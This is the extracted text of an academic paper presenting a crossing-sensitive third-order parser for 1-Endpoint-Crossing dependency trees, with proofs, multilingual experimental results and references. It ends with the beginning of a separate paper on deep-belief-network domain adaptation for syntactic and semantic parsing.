sub- problems for transitioning between portions of the tree with and without crossed edges. This formula- tion of the parsing problem presents two difficulties: 1. The parser must know whether an edge is crossed when it is added. 2. For uncrossed edges, the parser must use the appropriate part for scoring according to whether other edges are crossed (Table 2). Difficulty 1 is solved by adding crossed and un- crossed edges to the tree in distinct sub-problems (Section 4.1). Difficulty 2 is solved by producing different versions of subtrees over the same sets of vertices, both with and without a grandparent index, which differ in their assumptions about the tree out- side of that set (Section 4.2). The list of all sub- problems with their invariants and the full dynamic program are provided in the supplementary material. 4.1 Enforcing Crossing Edges The parser adds crossed and uncrossed edges in distinct portions of the dynamic program. Un- crossed edges are added only through trapezoid sub- problems (that may or may not have a grandpar- ent index), while crossed edges are added in non- trapezoid sub-problems. To add all uncrossed edges 44 in trapezoid sub-problems, the parser (a) enforces that any edge added anywhere else must be crossed, and (b) includes transitional sub-problems to build trapezoids when the edge ~ehm is not crossed, but the edge to its inner sibling ~ehs is (and so the construc- tion step shown in Figure 1b cannot be used). 4.1.1 Crossing Conditions Pitler et al. (2013) included crossing edges by using “crossing region” sub-problems over intervals with an external vertex that optionally contained edges between the interval and the external vertex. An uncrossed edge could then be included either by a derivation that prohibited it from being crossed or a derivation which allowed (but did not force) it to be crossed. This ambiguity is removed by enforcing that (1) each crossing region contains at least one edge incident to the exterior vertex, and (2) all such edges are crossed by edges in another sub-problem. For example, by requiring at least one edge between do and (favor, ?] and also between favor and (*, do), the edges in the two sets are guaranteed to cross. 4.1.2 Trapezoids with Edge to Inner Sibling Crossed To add all uncrossed edges in trapezoid-style sub- problems, we must be able to construct a trapezoid over vertices [h, m] whenever the edge ~ehm is not crossed. The construction used in Koo and Collins (2010), repeated graphically in Figure 5a, cannot be used if the edge ~ehs is crossed, as there would then exist edges between (h, s) and (s, m), making s an invalid split point. The parser therefore includes some “transitional glue” to allow alternative ways to construct the trapezoid over [h, m] when ~ehm is not crossed but the edge ~ehs to m’s inner sibling is. The two additional ways of building trapezoids are shown graphically in Figures 5b and 5c. Con- sider the “chain of crossing edges” that includes the edge ~ehs. If none of these edges are in the subtree rooted at m, then we can build the tree involving m and its inner descendants separately (Figure 5b) from the rest of the tree rooted at h. Within the in- terval [h, e − 1] the furthest edge incident to h (~ehs) must be crossed: these intervals are parsed choosing s and the crossing point of ~ehs simultaneously (as in Figure 4 in Pitler et al. (2013)). Otherwise, the sub-tree rooted at m is involved in g h = g h + hm ss m (a) Edge from h to inner sibling s is not crossed (re- peats Figure 1b) g h = hm mh + ee−1 (b) ~ehs is crossed, but the chain of crossing edges involving ~ehs does not include any descendants of m. e is m’s descendant furthest from m within (h, m). s ∈ (h, e−1). h m + d = mg h h d (c) ~ehs is crossed, and the chain of crossing edges involving ~ehs includes descendants of m. Of m’s de- scendants that are incident to edges in the chain, d is the one closest to m (d can be m itself). s ∈ (h, d). Figure 5: Ways to build a trapezoid when the edge ~ehs to m’s inner sibling may be crossed. the chain of crossing edges (Figure 5c). The chain of crossing edges between h and d (m’s descendant, which may be m itself) is built up first then concate- nated with the triangle rooted at m containing m’s inner descendants not involved in the chain. Chains of crossing edges are constructed by re- peatedly applying two specialized types of L items that alternate between adding an edge from the in- terval to the exterior point (right-to-left) or from the exterior point to the interval (left-to-right) (Fig- ure 6). The boundary edges of the chain can be crossed more times without violating the 1- Endpoint-Crossing property, and so the beginning and end of the chain can be unrestricted crossing regions. These specialized chain sub-problems are also used to construct boxes (Figure 1c) over [s, m] with shared parent h when neither edge ~ehs nor ~ehm is crossed, but the subtrees rooted at m and at s cross each other (Figure 7). Lemma 1. The GrandSib-Crossing parser adds all uncrossed edges and only uncrossed edges in a tree in a “trapezoid” sub-problem. Proof. The only part is easy: when a trapezoid is built over an interval [h, m], all edges are internal to the interval, so no earlier edges could cross ~ehm. Af- 45 = + h s k s k + s k dh d di k x i d di k = + k k + x i x i d = + k k + x idx i = + i d x i d Figure 6: Constructing a chain of crossing edges h d m + h d m h me = h s m h s d = d e + Figure 7: Constructing a box when edges in m and s’s subtrees cross each other. ter the trapezoid is built, only the interval endpoints h and m are accessible for the rest of the dynamic program, and so an edge between a vertex in (h, m) and a vertex /∈ [h, m] can never be added. The Crossing Conditions ensure that every edge added in a non-trapezoid sub-problem is crossed. Lemma 2. The GrandSib-Crossing parser con- siders all 1-Endpoint-Crossing trees and only 1- Endpoint-Crossing trees. Proof. All trees that could have been built in Pitler et al. (2013) are still possible. It can be verified that the additional sub-problems added all obey the 1- Endpoint-Crossing property. 4.2 Reduced Context in Presence of Crossings A crossed edge (added in a non-trapezoid sub- problem) is scored as a CrossedEdge part. An uncrossed edge added in a trapezoid sub-problem, however, may need to be scored according to a GrandSib, Grand, Sib, or Edge part, depending on whether the relevant other edges are crossed. In this section we show that sibling and grandparent fea- tures are included in the GrandSib-Crossing parser as specified by Table 2. do favor most these days (a) For good contexts favor most these daysdo (b) For bad contexts Figure 8: For each of the interval sub-problems in Koo and Collins (2010), the parser constructs versions with and without the additional grandparent index. Figure 8b is used if the edge from do to favor is crossed, or if there are any crossed edges from favor to children to the left of do or to the right of days. Otherwise, Figure 8a is used. 4.2.1 Sibling Features Lemma 3. The GrandSib-Crossing parser scores an uncrossed edge ~ehm with a Sib or GrandSib part if and only if ~ehs is not crossed. Proof. Whether the edge to an uncrossed edge’s in- ner sibling is crossed is known bottom-up through how the trapezoid is constructed, since the inner sib- ling is internal to the sub-problem. When ~ehs is not crossed, the trapezoid is constructed as in Figure 5a, using the inner sibling as the split point. When the edge ~ehs is crossed, the trapezoid is constructed as in Figure 5b or 5c; note that both ways force the edge to the inner sibling to be crossed. 4.2.2 Grandparent Features for GProj Edges Koo and Collins (2010) include an external grand- parent index for each of the sub-problems that the edges within use for scoring. We want to avoid adding such an external grandparent index to any of the crossing region sub-problems (to stay within the desired time and space constraints) or to inter- val sub-problems when the external context would make all internal edges ¬GProj . For each interval sub-problem, the parser con- structs versions both with and without a grandpar- ent index (Figure 8). Which version is used de- pends on the external context. In a bad context, all edges to children within an interval are guaranteed to be ¬GProj . This section shows that all boundary points in crossing regions are placed in bad contexts, and then that edges are scored with grandparent fea- tures if and only if they are GProj . Bad Contexts for Interval Boundary Points For exterior vertex boundary points, all edges from it to its children will be crossed (Section 4.1.1), so it does not need a grandparent index. 46 Lemma 4. If a boundary point i’s parent (call it g) is within a sub-problem over vertices [i, j] or [i, j]∪ {x}, then for all uncrossed edges ~eim with m in the sub-problem, the tree outside of the sub-problem is irrelevant to whether ~eim is GProj . Proof. The sub-problem contains the edge ~egi, so Condition (1) is checked internally. m cannot be x, since ~eim is uncrossed. If g is x, then ~eim is ¬GProj regardless of the outer context. If both g and m ∈ (i, j], then Outer(m) ⊆ (i, j]: If m is an interior child of i (m ∈ (i, g)) then Outer(m) ⊆ (m, g) ⊆ (i, j]. Otherwise, if m is an exterior child (m ∈ (g, j]), by the “wrapping around” definition of Outer, Outer(m) ⊆ (g, m) ⊆ (i, j]. Thus Condi- tion (2) is also checked internally. We can therefore focus on interval boundary points with their parent outside of the sub-problem. Definition 3. The left boundary vertex of an inter- val [i, j] is in a bad context (BadContextL(i, j)) if i receives its parent (call it g) from outside of the sub-problem and either of the following hold: 1. Grand-Edge Crossed: ~egi is crossed 2. Outer-Child-Edge Crossed: An edge from i to a child of i outside of [i, j] and Outer to j will be crossed (recall this includes children on the far side of g if g is to the left of i) BadContextR(i, j) is defined symmetrically regard- ing j and j’s parent and children. Corollary 1. If BadContextL(i, j), then for all ~eim with m ∈ (i, j], ~eim is ¬GProj . Similarly, if BadContextR(i, j), for all ~ejm with m ∈ [i, j), ~ejm is ¬GProj . No Grandparent Indices for Crossing Regions We would exceed the desired O(n4) run-time if any crossing region sub-problems needed any grand- parent indices. In Pitler et al. (2013), LR sub- problems with edges from the exterior point crossed by both the left and the right boundary points were constructed by concatenating an L and an R sub- problem. Since the split point was not necessar- ily incident to a crossed edge, the split point might have GProj edges to children on the side other than where it gets its parent; accommodating this would add another factor of n to the running time and space x k jx i j = + kix Figure 9: For all split points k, the edge from k’s parent to k is crossed, so all edges from k to children on either side were ¬GProj . The case when the split point’s parent is from the right is symmetric. x i k j (a) x is Outer to all children of k in (k, j]. x i k j (b) x is Outer to all children of k in [i, k). Figure 10: The edge ~ekx is guaranteed to be crossed, so k is in a BadContext for whichever side it does not get its parent from. to store the split point’s parent. To avoid this in- crease in running time, they are instead built up as in Figure 9, which chooses the split point so that the edge from the parent of the split point to it is crossed. Lemma 5. For all crossing region sub-problems [i, j] ∪ {x} with i’s parent /∈ [i, j] ∪ {x}, BadContextL(i, j). Similarly, when j’s parent /∈ [i, j]∪{x}, BadContextR(i, j). Proof. Crossing region sub-problems either com- bine to form intervals or larger crossing regions. When they combine to form intervals as in Figure 3, it can be verified that all boundary points are in a bad context. LR sub-problems were discussed above. Split points for the L/R/N sub-problems by construction are incident to a crossed edge to a fur- ther vertex. If that edge is from the split point’s par- ent to the split point, then the grand-edge is crossed and so both sides are in a bad context. If the crossed edge is from the split point to a child, then that child is Outer to all other children on the side in which it does not get its parent (see Figure 10). Corollary 2. No grandparent indices are needed for any crossing region sub-problem. Triangles and Trapezoids with and without Grandparent Indices The presentation that fol- lows assumes left-headed versions. Uncrossed edges are added in two distinct types of trapezoids: (1) TrapG[h, m, g, L] with an external grandpar- ent index g, scores the edge ~ehm with grandpar- 47 ent features, and (2) Trap[h, m, L] without a grand- parent index, scores the edge ~ehm without grand- parent features. Triangles also have versions with (TriG[h, e, g, L] and without (Tri[h, e, L]) a grand- parent index. What follows shows that all GProj edges are added in TrapG sub-problems, and all ¬GProj uncrossed edges are added in Trap sub- problems. Lemma 6. For all k ∈ (i, j), if BadContextL(i, j), then BadContextL(i, k). Similarly, if BadContextR(i, j), then BadContextR(k, j). Proof. BadContextL(i, j) implies either the edge from i’s parent to i is crossed and/or an edge from i to a child of i outer to j is crossed. If the edge from i’s parent to i is crossed, then BadContextL(i, k). If a child of i is outer to j, then since k ∈ (i, j), such a child is also outer to k. Lemma 7. All left-rooted triangle sub-problems Tri[i, j, L] without a grandparent index are in a BadContextL(i, j). Similarly for all Tri[i, j, R], BadContextR(i, j). Proof. All triangles without grandparent indices are either placed immediately into a bad context (by adding a crossed edge to the triangle’s root from its parent, or a crossed edge from the root to an outer child) or are combined with other sub-trees to form larger crossing regions (and therefore the triangle is in a bad context, using Lemmas 5 and 6). Lemma 8. All triangle sub-problems with a grand- parent index TriG[h, e, g, L] are placed in a ¬BadContextL(h, e). Similarly, TriG[e, h, g, R] are only placed in ¬BadContextR(h, e). Proof. Consider where a non-empty triangle (h 6= e) with a grandparent index TriG[h, e, g, L] can be placed in the full dynamic program and what each step would imply about the rest of the tree. If the triangle contains exterior children of h (e and g are on opposite sides of h), then it can either combine with a trapezoid to form another larger tri- angle (as in Figure 1a) or it can combine with an- other sub-problem to form a box with a grandpar- ent index (Figure 1c or 7). Boxes with a grandpar- ent index can only combine with another trapezoid to form a larger trapezoid (Figure 1b). Both cases force ~egh to not be crossed and prevent h from hav- ing any outer crossed children, as h becomes an in- ternal node within the larger sub-problem. If the triangle contains interior children of h (e lies between g and h), then it can either form a trape- zoid from g to h by combining with a triangle (Fig- ure 5b) or a chain of crossing edges (Figure 5c), or it can be used to build a box with a grandparent index (Figures 1c and 7), which then can only be used to form a trapezoid from g to h. In either case, a trape- zoid is constructed from g to h, enforcing that ~egh cannot be crossed. These steps prevent h from hav- ing any additional children between g and e (since h does not appear in the adjacent sub-problems at all whenever h 6= e), so again the children of h in (e, h) have no outer siblings. Lemma 9. In a TriG[h, e, g, L] sub-problem, if an edge ~ehm is not crossed and no edges from i to sib- lings of m in (m, e] are crossed, then ~ehm is GProj . Proof. This follows from (1) the edge ~ehm is not crossed, (2) the edge ~egh is not crossed by Lemma 8, and (3) no outer siblings are crossed (outer siblings in (m, e] are not crossed by assumption and siblings outer to e are not crossed by Lemma 8). Lemma 10. An edge ~ehm scored with a GrandSib or Grand part (added through a TrapG[h, m, g, L] or TrapG[m, h, g, R] sub-problem) is GProj . Proof. A TrapG can either (1) combine with de- scendants of m to form a triangle with a grandparent index rooted at h (indicating that m is the outermost inner child of h) or (2) combine with descendants of m and of m’s adjacent outer sibling (call it o), forming a trapezoid from h to o (indicating that ~eho is not crossed). Such a trapezoid could again only combine with further uncrossed outer siblings until eventually the final triangle rooted at h with grand- parent index g is built. As ~ehm was not crossed, no edges from h to outer siblings within the triangle are crossed, and ~ehm is within a TriG sub-problem, ~ehm is GProj by Lemma 9. Lemma 11. An uncrossed edge ~ehm scored with a Sib or Edge part (added through a Trap[h, m, L] or Trap[m, h, R] sub-problem) is ¬GProj . 48 Proof. A Trap can only (1) form a triangle without a grandparent index, or (2) form a trapezoid to an outer sibling of m, until eventually a final triangle rooted at h without a grandparent index is built. This triangle without a grandparent index is then placed in a bad context (Lemma 7) and so ~ehm is ¬GProj (Corollary 1). 4.3 Main Results Lemma 12. The crossing-sensitive third-order parser runs in O(n4) time and O(n3) space when the input is an unpruned graph. When the input to the parser is a pruned graph with at most k in- coming edges per node, the crossing-sensitive third- order parser runs in O(kn3) time and O(n3) space. Proof. All sub-problems are either over intervals (two indices), intervals with a grandparent index (three indices), or crossing regions (three indices). No crossing regions require any grandparent indices (Corollary 2). The only sub-problems that require a maximization over two internal split points are over intervals and need no grandparent indices (as the furthest edges from each root are guaranteed to be crossed within the sub-problem). All steps ei- ther contain an edge in their construction step or in the invariant of the sub-problem, so with a pruned graph as input, the running time is the number of edges (O(kn)) times the number of possibilities for the other two free indices (O(n2)). The space is not reduced as there is not necessarily an edge relation- ship between the three stored vertices. Theorem 1. The GrandSib-Crossing parser cor- rectly finds the maximum scoring 1-Endpoint- Crossing tree according to the crossing-sensitive third-order factorization (Section 3) in O(n4) time and O(n3) space. When the input to the parser is a pruned graph with at most k incoming edges per node, the GrandSib-Crossing parser correctly finds the maximum scoring 1-Endpoint-Crossing tree that uses only unpruned edges in O(kn3) time and O(n3) space. Proof. The correctness of scoring follows from Lemmas 3, 10, and 11. The search space of 1- Endpoint-Crossing trees was in Lemma 2 and the time and space complexity in Lemma 12. The parser produces the optimal tree in a well- defined output space. Pruning edges restricts the output space the same way that constraints enforc- ing projectivity or the 1-Endpoint-Crossing property also restrict the output space. Note that if the optimal unconstrained 1-Endpoint-Crossing tree does not in- clude any pruned edges, then whether the parser uses pruning or not is irrelevant; both the pruned and un- pruned parsers will produce the exact same tree. 5 Experiments The crossing-sensitive third-order parser was imple- mented as an alternative parsing algorithm within dpo3 (Koo and Collins, 2010).2 To ensure a fair comparison, all code relating to input/output, fea- tures, learning, etc. was re-used from the origi- nal projective implementation, and so the only sub- stantive differences between the projective and 1- Endpoint-Crossing parsers are the dynamic pro- gramming charts, the parsing algorithms, and the routines that extract the maximum scoring tree from the completed chart. The treebanks used to prepare the CoNLL shared task data (Buchholz and Marsi, 2006; Nivre et al., 2007) vary widely in their conventions for repre- senting conjunctions, modal verbs, determiners, and other decisions (Zeman et al., 2012). The exper- iments use the newly released HamleDT software (Zeman et al., 2012) that normalizes these treebanks into one standard format and also provides built-in transformations to other conjunction styles. The un- normalized treebanks input to HamleDT were from the CoNLL 2006 Shared Task (Buchholz and Marsi, 2006) for Danish, Dutch, Portuguese, and Swedish and from the CoNLL 2007 Shared Task (Nivre et al., 2007) for Czech. The experiments include the default Prague style (Böhmová et al., 2001), Mel’čukian style (Mel’čuk, 1988), and Stanford style (De Marneffe and Manning, 2008) for conjunctions. Under the grandparent-sibling factorization, the two words be- ing conjoined would never appear in the same scope for the Prague style (as they are siblings on differ- ent sides of the conjunct head). In the Mel’čukian style, the two conjuncts are in a grandparent rela- tionship and in the Stanford style the two conjuncts 2http://groups.csail.mit.edu/nlp/dpo3/ 49 are in a sibling relationship, and so we would expect to see larger gains for including grandparents and siblings under the latter two representations. The experiments also include a nearly projective dataset, the English Penn Treebank (Marcus et al., 1993), converted to dependencies with PennConverter (Jo- hansson and Nugues, 2007). The experiments use marginal-based pruning based on an edge-factored directed spanning tree model (McDonald et al., 2005). Each word’s set of potential parents is limited to those with a marginal probability of at least .1 times the probability of the most probable parent, and cut off this list at a max- imum of 20 potential parents per word. To ensure that there is always at least one projective and/or 1- Endpoint-Crossing tree achievable, the artificial root is always included as an option. The pruning param- eters were chosen to keep 99.9% of the true edges on the English development set. Following Carreras (2007) and Koo and Collins (2010), before training the training set trees are transformed to be the best achievable within the model class (i.e., the closest projective tree or 1- Endpoint-Crossing tree). All models are trained for five iterations of averaged structured perceptron training. For English, the model after the iteration that performs best on the development set is used; for all other languages, the model after the fifth iter- ation is used. 5.1 Results Results for edge-factored and (crossing-sensitive) grandparent-sibling factored models for both projec- tive and 1-Endpoint-Crossing parsing are in Tables 4 and 5. In 14 out of the 16 experimental set-ups, the third-order 1-Endpoint-Crossing parser is more accurate than the third-order projective parser. It is significantly better than the projective parser in 9 of the set-ups and significantly worse in none. Table 6 shows how often the 1-EC CS-GSib parser used each of the GrandSib, Grand, Sib, Edge, and CrossedEdge parts for the Mel’čukian and Stanford style test sets. In both representations, 3Following prior work in graph-based dependency parsing (for example, Rush and Petrov (2012)), English results use au- tomatically produced part-of-speech tags and results exclude punctuation, while the results for all other languages use gold part-of-speech tags and include punctuation. Model Du Cz Pt Da Sw Prague Proj GSib 80.45 85.12 88.85 88.17 85.50 Proj Edge 80.38 84.04 88.14 88.29 86.09 1-EC CS-GSib 82.78 85.90 89.74 88.64 85.70 1-EC Edge 83.33 84.97 89.21 88.19 86.46 Mel’čukian Proj GSib 82.26 87.96 89.19 90.23 89.59 Proj Edge 82.09 86.18 88.73 89.29 89.00 1-EC CS-GSib 86.03 87.89 90.34 90.50 89.34 1-EC Edge 85.28 87.57 89.96 90.14 88.97 Stanford Proj GSib 81.16 86.83 88.80 88.84 87.27 Proj Edge 80.56 86.18 88.61 88.69 87.92 1-EC CS-GSib 84.67 88.34 90.20 89.22 88.15 1-EC Edge 83.62 87.13 89.43 88.74 87.36 Table 4: Overall Unlabeled Attachment Scores (UAS) for all words.3 CS-GSib is the proposed crossing-sensitive grandparent-sibling factorization. For each data set, we bold the most accurate model and those not significantly different from the most accurate (sign test, p < .05). Lan- guages are sorted in increasing order of projectivity. Model UAS Proj GSib 93.10 Proj Edge 92.63 1-EC CS-GSib 93.22 1-EC Edge 92.80 Table 5: English results the parser is able to score with a sibling context more often than it is able to score with a grandpar- ent, perhaps explaining why the datasets using the Stanford conjunction representation saw the largest gains from including the higher order factors into the 1-Endpoint-Crossing parser. Across languages, the third-order 1-Endpoint- Crossing parser runs 2.1-2.7 times slower than the third-order projective parser (71-104 words per sec- ond, compared with 183-268 words per second). Parsing speed is correlated with the amount of prun- ing. The level of pruning mentioned earlier is rela- tively permissive, retaining 39.0-60.7% of the edges in the complete graph; a higher level of pruning could likely achieve much faster parsing times with the same underlying parsing algorithms. 50 Part Used Du Cz Pt Da Sw Mel’čukian CrossedEdge 8.5 4.5 3.2 1.4 1.2 GrandSib 81.2 89.1 90.7 95.7 96.2 Grand 1.1 0.5 0.8 0.3 0.2 Sib 9.0 5.8 5.2 2.6 2.3 Edge < 0.1 < 0.1 0 < 0.1 0 Stanford CrossedEdge 8.4 5.1 3.3 2.0 1.8 GrandSib 81.4 87.8 90.5 94.2 95.2 Grand 1.1 0.5 0.7 0.3 0.3 Sib 8.9 6.5 5.2 3.5 2.6 Edge < 0.1 0.1 0 < 0.1 0 Table 6: The proportion of edges in the predicted output trees from the CS-GSib 1-Endpoint-Crossing parser that would have used each of the five part types for scoring. 6 Discussion There have been many other notable approaches to non-projective parsing with larger scopes than single edges, including transition-based parsers, directed spanning tree graph-based parsers, and mildly non- projective graph-based parsers. Transition-based parsers score actions that the parser may take to transition between different configurations. These parsers typically use either greedy or beam search, and can condition on any tree context that is in the history of the parser’s actions so far. Zhang and Nivre (2011) signifi- cantly improved the accuracy of an arc-eager tran- sition system (Nivre, 2003) by adding several ad- ditional classes of features, including some third- order features. Basic arc-eager and arc-standard (Nivre, 2004) models that parse left-to-right using a stack produce projective trees, but transition-based parsers can be modified to produce crossing edges. Such modifications include pseudo-projective pars- ing in which the dependency labels encode transfor- mations to be applied to the tree (Nivre and Nilsson, 2005), adding actions that add edges to words in the stack that are not the topmost item (Attardi, 2006), adding actions that swap the positions of words (Nivre, 2009), and adding a second stack (Gómez- Rodrı́guez and Nivre, 2010). Graph-based approaches to non-projective pars- ing either consider all directed spanning trees or re- stricted classes of mildly non-projective trees. Di- rected spanning tree approaches with higher order features either use approximate learning techniques, such as loopy belief propagation (Smith and Eis- ner, 2008), or use dual decomposition to solve relax- ations of the problem (Koo et al., 2010; Martins et al., 2013). While not guaranteed to produce optimal trees within a fixed number of iterations, these dual decomposition techniques do give certificates of op- timality on the instances in which the relaxation is tight and the algorithm converges quickly. This paper described a mildly non-projective graph-based parser. Other parsers in this class find the optimal tree in the class of well-nested, block degree two trees (Gómez-Rodrı́guez et al., 2011), or in a class of trees further restricted based on gap inheritance (Pitler et al., 2012) or the head-split property (Satta and Kuhlmann, 2013), with edge- factored running times of O(n5) − O(n7). The factorization used in this paper is not immediately compatible with these parsers: the complex cases in these parsers are due to gaps, not crossings. How- ever, there may be analogous “gap-sensitive” factor- izations that could allow these parsers to be extended without large increases in running times. 7 Conclusion This paper proposed an exact, graph-based algo- rithm for non-projective parsing with higher order features. The resulting parser has the same asymp- totic run time as a third-order projective parser, and is significantly more accurate for many experimental settings. An exploration of other factorizations that facilitate non-projective parsing (for example, an analogous “gap-sensitive” variant) may be an inter- esting avenue for future work. Recent work has in- vestigated faster variants for third-order graph-based projective parsing (Rush and Petrov, 2012; Zhang and McDonald, 2012) using structured prediction cascades (Weiss and Taskar, 2010) and cube prun- ing (Chiang, 2007). It would be interesting to extend these lines of work to the crossing-sensitive third- order parser as well. Acknowledgments I would like to thank Sampath Kannan, Mitch Mar- cus, Chris Callison-Burch, Michael Collins, Mark Liberman, Ben Taskar, Joakim Nivre, and the three anonymous reviewers for valuable comments on ear- lier versions of this material. 51 References G. Attardi. 2006. Experiments with a multilanguage non-projective dependency parser. In Proceedings of CoNLL, pages 166–170. A. Böhmová, J. Hajič, E. Hajičová, and B. Hladká. 2001. The Prague Dependency Treebank: Three-level anno- tation scenario. In Anne Abeillé, editor, Treebanks: Building and Using Syntactically Annotated Corpora, pages 103–127. Kluwer Academic Publishers. B. Bohnet and J. Kuhn. 2012. The best of both worlds – a graph-based completion model for transition-based parsers. In Proceedings of EACL, pages 77–87. S. Buchholz and E. Marsi. 2006. CoNLL-X shared task on multilingual dependency parsing. In Proceedings of CoNLL, pages 149–164. X. Carreras. 2007. Experiments with a higher-order projective dependency parser. In Proceedings of the CoNLL Shared Task Session of EMNLP-CoNLL, pages 957–961. E. Charniak and M. Johnson. 2005. Coarse-to-fine n- best parsing and maxent discriminative reranking. In Proceedings of ACL, pages 173–180. D. Chiang. 2007. Hierarchical phrase-based translation. Computational Linguistics, 33(2):201–228. M. De Marneffe and C. Manning. 2008. Stanford typed dependencies manual. J. Eisner. 2000. Bilexical grammars and their cubic- time parsing algorithms. In Harry Bunt and Anton Nijholt, editors, Advances in Probabilistic and Other Parsing Technologies, pages 29–62. Kluwer Academic Publishers. C. Gómez-Rodrı́guez and J. Nivre. 2010. A transition- based parser for 2-planar dependency structures. In Proceedings of ACL, pages 1492–1501. C. Gómez-Rodrı́guez, J. Carroll, and D. Weir. 2011. De- pendency parsing schemata and mildly non-projective dependency parsing. Computational Linguistics, 37(3):541–586. K. Hall. 2007. K-best spanning tree parsing. In Proceed- ings of ACL, pages 392–399. R. Johansson and P. Nugues. 2007. Extended constituent-to-dependency conversion for English. In Proceedings of the 16th Nordic Conference on Com- putational Linguistics (NODALIDA), pages 105–112. T. Koo and M. Collins. 2010. Efficient third-order de- pendency parsers. In Proceedings of ACL, pages 1–11. T. Koo, A. M. Rush, M. Collins, T. Jaakkola, and D. Son- tag. 2010. Dual decomposition for parsing with non- projective head automata. In Proceedings of EMNLP, pages 1288–1298. T. Koo. 2010. Advances in discriminative dependency parsing. Ph.D. thesis, Massachusetts Institute of Tech- nology. S. Kübler, R. McDonald, and J. Nivre. 2009. Depen- dency parsing. Synthesis Lectures on Human Lan- guage Technologies, 2(1):1–127. M. P. Marcus, M. A. Marcinkiewicz, and B. Santorini. 1993. Building a large annotated corpus of En- glish: The Penn Treebank. Computational Linguistics, 19(2):313–330. A. F. T. Martins, N. A. Smith, and E. P. Xing. 2009. Concise integer linear programming formulations for dependency parsing. In Proceedings of ACL, pages 342–350. A. Martins, M. Almeida, and N. A. Smith. 2013. Turn- ing on the turbo: Fast third-order non-projective turbo parsers. In Proceedings of ACL (Short Papers), pages 617–622. R. McDonald and F. Pereira. 2006. Online learning of approximate dependency parsing algorithms. In Pro- ceedings of EACL, pages 81–88. R. McDonald and G. Satta. 2007. On the complexity of non-projective data-driven dependency parsing. In Proceedings of the 10th International Conference on Parsing Technologies, pages 121–132. R. McDonald, F. Pereira, K. Ribarov, and J. Hajič. 2005. Non-projective dependency parsing using span- ning tree algorithms. In Proceedings of HLT/EMNLP, pages 523–530. I. Mel’čuk. 1988. Dependency Syntax: Theory and Practice. State University of New York Press. J. Nivre and J. Nilsson. 2005. Pseudo-projective depen- dency parsing. In Proceedings of ACL, pages 99–106. J. Nivre, J. Hall, S. Kübler, R. McDonald, J. Nilsson, S. Riedel, and D. Yuret. 2007. The CoNLL 2007 shared task on dependency parsing. In Proceedings of the CoNLL Shared Task Session of EMNLP-CoNLL, pages 915–932. J. Nivre. 2003. An efficient algorithm for projective de- pendency parsing. In Proceedings of the 8th Interna- tional Workshop on Parsing Technologies, pages 149– 160. J. Nivre. 2004. Incrementality in deterministic depen- dency parsing. In Proceedings of the Workshop on In- cremental Parsing: Bringing Engineering and Cogni- tion Together, pages 50–57. J. Nivre. 2009. Non-projective dependency parsing in expected linear time. In Proceedings of ACL, pages 351–359. E. Pitler, S. Kannan, and M. Marcus. 2012. Dynamic programming for higher order parsing of gap-minding trees. In Proceedings of EMNLP, pages 478–488. E. Pitler, S. Kannan, and M. Marcus. 2013. Find- ing optimal 1-Endpoint-Crossing trees. Transac- tions of the Association for Computational Linguistics, 1(Mar):13–24. 52 A. Rush and S. Petrov. 2012. Vine pruning for effi- cient multi-pass dependency parsing. In Proceedings of NAACL, pages 498–507. G. Satta and M. Kuhlmann. 2013. Efficient parsing for head-split dependency trees. Transactions of the As- sociation for Computational Linguistics, 1(July):267– 278. D. A. Smith and J. Eisner. 2008. Dependency parsing by belief propagation. In Proceedings of EMNLP, pages 145–156. D. Weiss and B. Taskar. 2010. Structured Prediction Cascades. In AISTATS, pages 916–923. D. Zeman, D. Mareček, M. Popel, L. Ramasamy, J. Štěpánek, Z. Žabokrtský, and J. Hajič. 2012. Ham- leDT: To parse or not to parse? In Proceedings of the Eight International Conference on Language Re- sources and Evaluation (LREC’12), pages 2735–2741. H. Zhang and R. McDonald. 2012. Generalized higher- order dependency parsing with cube pruning. In Pro- ceedings of EMNLP, pages 320–331. Y. Zhang and J. Nivre. 2011. Transition-based depen- dency parsing with rich non-local features. In Pro- ceedings of ACL (Short Papers), pages 188–193. 53 54 work_57lneblzxjhgdbzxcmcswlxbxu ---- Domain Adaptation for Syntactic and Semantic Dependency Parsing Using Deep Belief Networks Haitong Yang, Tao Zhuang and Chengqing Zong National Laboratory of Pattern Recognition Institute of Automation, Chinese Academy of Sciences, Beijing, 100190, China {htyang, tao.zhuang, cqzong}@nlpr.ia.ac.cn Abstract In current systems for syntactic and seman- tic dependency parsing, people usually de- fine a very high-dimensional feature space to achieve good performance. But these systems often suffer severe performance drops on out- of-domain test data due to the diversity of fea- tures of different domains. This paper fo- cuses on how to relieve this domain adapta- tion problem with the help of unlabeled tar- get domain data. We propose a deep learning method to adapt both syntactic and semantic parsers. With additional unlabeled target do- main data, our method can learn a latent fea- ture representation (LFR) that is beneficial to both domains. Experiments on English data in the CoNLL 2009 shared task show that our method largely reduced the performance drop on out-of-domain test data. Moreover, we get a Macro F1 score that is 2.32 points higher than the best system in the CoNLL 2009 shared task in out-of-domain tests. 1 Introduction Both syntactic and semantic dependency parsing are the standard tasks in the NLP community. The state- of-the-art model performs well if the test data comes from the domain of the training data. But if the test data comes from a different domain, the perfor- mance drops severely. The results of the shared tasks of CoNLL 2008 and 2009 (Surdeanu et al., 2008; Hajič et al., 2009) also substantiates the argument. To relieve the domain adaptation, in this paper, we propose a deep learning method for both syntactic and semantic parsers. We focus on the situation that, besides source domain training data and target do- main test data, we also have some unlabeled target domain data. Many syntactic and semantic parsers are devel- oped using a supervised learning paradigm, where each data sample is represented as a vector of fea- tures, usually a high-dimensional feature. The per- formance degradation on target domain test data is mainly caused by the diversity of features of differ- ent domains, i.e., many features in target domain test data are never seen in source domain training data. Previous work have shown that using word clus- ters to replace the sparse lexicalized features (Koo et al., 2008; Turian et al., 2010), helps relieve the performance degradation on the target domain. But for syntactic and semantic parsing, people also use a lot of syntactic features, i.e., features extracted from syntactic trees. For example, the relation path be- tween a predicate and an argument is a syntactic fea- ture used in semantic dependency parsing (Johans- son and Nugues, 2008). Figure 1 shows an exam- ple of this relation path feature. Obviously, syntac- tic features like this are also very sparse and usu- ally specific to each domain. The method of clus- tering fails in generalizing these kinds of features. Our method, however, is very different from clus- tering specific features and substituting these fea- tures using their clusters. Instead, we attack the do- main adaption problem by learning a latent feature representation (LFR) for different domains, which is similar to Titov (2011). Formally, we propose a Deep Belief Network (DBN) model to represent a data sample using a vector of latent features. This latent feature vector is inferred by our DBN model 271 Transactions of the Association for Computational Linguistics, vol. 3, pp. 271–282, 2015. Action Editor: Hal Daumé III. Submission batch: 3/2015; Published 5/2015. c©2015 Association for Computational Linguistics. Distributed under a CC-BY-NC-SA 4.0 license. wantsShe payto ayou 